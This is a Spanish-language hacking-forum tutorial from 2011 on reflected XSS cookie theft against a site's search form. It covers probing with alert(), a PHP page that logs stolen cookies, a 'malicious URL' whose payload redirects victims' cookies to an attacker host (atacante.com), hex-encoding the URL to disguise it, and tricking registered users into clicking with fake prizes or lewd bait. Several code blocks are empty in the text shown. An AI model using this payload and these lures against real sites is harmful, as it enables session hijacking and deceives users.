ÍndiceElectro HackersFAQBuscarMiembrosGrupos de UsuariosRegistrarseConectarse

Comparte | 
 

 [Tutorial] XSS Injection

Ver el tema anterior Ver el tema siguiente Ir abajo 
AutorMensaje
XFacebook



Mensajes : 17
Fecha de inscripción : 15/10/2011

MensajeTema: [Tutorial] XSS Injection   Sáb Oct 15, 2011 9:38 pm

Bueno pues voy ha hacer una pequeña introducción a los ataques XSS, el caso que voy a poner es el de una web que utilize cookies y tenga un buscador(el típico buscador que tiene una caja de texto y un botón).
decir que para una facil compresión de este mini-tutorial es mejor tener unos conocimientos básicos sobre html.

[~]Lo primero es hacer una pequeña introduccion sobre que es una cookie:
Citar

- Una cookie es un almacen de informacion que se guarda en el ordenador del usuario y en cualkier momento la pagina puede pedir la informacion, que contiene la cookie, al ordenador del usuario...
* Ahora que sabemos que es una cookie lo que vamos ha hacer es ver el nombre de la página donde se encuentra el buscador, en nuestro caso es buscador.php(xDD)
* Después vamos a ver si el buscador es vulnerable. Para ello podemos poner en el buscador, por ejemplo:



Codigo:
alert()


[~]Si salta una alarma al pulsar el boton, significa que ese buscador es vulnerable.
[~]Si no salta pues no jodemos y a buscar otro...

* Suponiendo que sea vulnerable, el siguiente paso es ver el nombre de la caja de texto y del botón.

Para esto, tenemos que ver el codigo fuente de dicha página y buscar algo como:
que será el textbox(caja de texto xD).
que será el boton.

* Ahora ya sabemos que el textbox se llama palabra y que el botón se llama buscar.

[~]Para almacenar las cookies, tenermos dos opciones -> almazenarlas en una base de datos(mysql) o almacenarlas en un archivo de texto(la mas facil).

* A continuacion vamos a crear una pagina en php, este archivo creará otro (archivo.txt) cuando algun usuario caiga en el ataque y escribira a continuacion los siguientes usuarios.

cookies.php
Código:



archivo.txt
Este archivo se creara automaticamente y será en el que se almacenen las cookies, osease, que para ver los resultados teneis que entrar en este archivo.

* Una vez hecho este paso solo tenemos que crear "LA URL MALIGNA"(como yo lo llamo) que será de la siguiente forma:





* Voy a explicar cada parte de esta "URL MALIGNA".
[~]

http://www.vulnerable.com/buscador.php
Esta parte lo unico que hace es entrar en la pagina del buscador.

[~]?palabra=
Esta parte es para darle un valor a la variable palabra, es decir, si el textbox se llamara manolo esto quedaría de la siguiente forma: ?manolo=

Lo mas importante:
[~]window.location='http://www.atacante.com/cookies.php?...okie;
Esto es el valor que le damos a la variable palabra (que es el textbox). Este valor lo que hace esque redirecciona a la pagina http://www.atacante.com/cookie.php y le da el valor de la cookie(del usuario de la web) a la variables cookie de la pagina que creamos antes(cookies.php)
Suena un poco lioso pero es muy simple.

[~]&buscar=;
Esto lo que hace es simular que el boton (con el nombre -> buscar) este pulsado, sin esto no realizaria la acción.
Tambien decir que si el botón del buscador se llamara jose, eso tendriamos que reemplazarlo por &jose=;

* Ahora viene la parte mas importante, que es hacer que un usuario de esa web(que esté registrado) entre en ese enlace("LA URL MALIGNA").

Esto seguramente sea la parte mas complicada, porque cualkier persona con unos conocimientos muy basicos de programacion web sabría lo que hace esa "URL MALIGNA". Con lo cual vamos a proceder a "camuflar" un poco esa URL.
Para esto vamos a sustituir cada caracter por su correspondiente valor en hexagesimal poniendo el signo % delante de cada uno.

Aquí os dejo una buena tabla HEX:
http://www.ascii.cl/es/

Con lo cual iría quedando algo así:



esto equivaldría a:



y tendrias que continuar cambiando los caracteres a hexagesimal.

Como conseguir que un usuario de esa web entre en esa URL, jejeje, pues ¡¡¡puedes decirle que le toca un premio si entra!!!(xDD) o puedes entrar al foro de esa web(si lo tuviera) y poner la direccion con alguna buena escusa como: "Que le pasa a la web, cuando entro en esta URL me sale una tía en bolas";
Otra opción es ponerlo como una noticia (si tienes un sistemas de noticias) o como se te ocurra.

=============================================
Solo me queda decir que no solo son vulnerbles a un ataque XSS los buscadores, puede ser cualquier formulario que os encontreis por internet, desde un registro de usuario hasta un foro(lo digo por experiencia).
=============================================

CONCLUSION: Este ataque se basa en redireccionar a un usuario(sea como sea) hacia una pagina, tuya, en la que guardes su cookie.

Fuente...

--------------------------------------------------Fin--------------------------------------------------------------------------- ---------------

Bueno este tuto se basa en hackear una web mediante XSS Injection pero no solo unna web normal si no que tambien se pueden hackear Holos antiguos mediante esta injection bueno yo lo que are sera dejarle tambien un videotutorial creado By Pivot en ese tuto lo malo es que los Codigos no se ven bien pero por un lado en este mismo tutorial (arriba) estan los codigos por orden al = que en el video

Bueno espero que aprendan los que no saben bla Bla Bla ect... xp
Volver arriba Ir abajo
Ver perfil de usuario
 
[Tutorial] XSS Injection
Ver el tema anterior Ver el tema siguiente Volver arriba 
Página 1 de 1.
 Temas similares
-
» Rayman Gold/Designer Pequeño tutorial sobre qué son los EVE.
» TUTORIAL "Como rellenar la ficha"
» TUTORIAL Para el uso del Chatbox
» Tutorial de cabinas
» TUTORIAL : NUEVA ANIMADORA HUMANA

Permisos de este foro:No puedes responder a temas en este foro.
 :: Herramientas :: Herramientas Webs-
Cambiar a: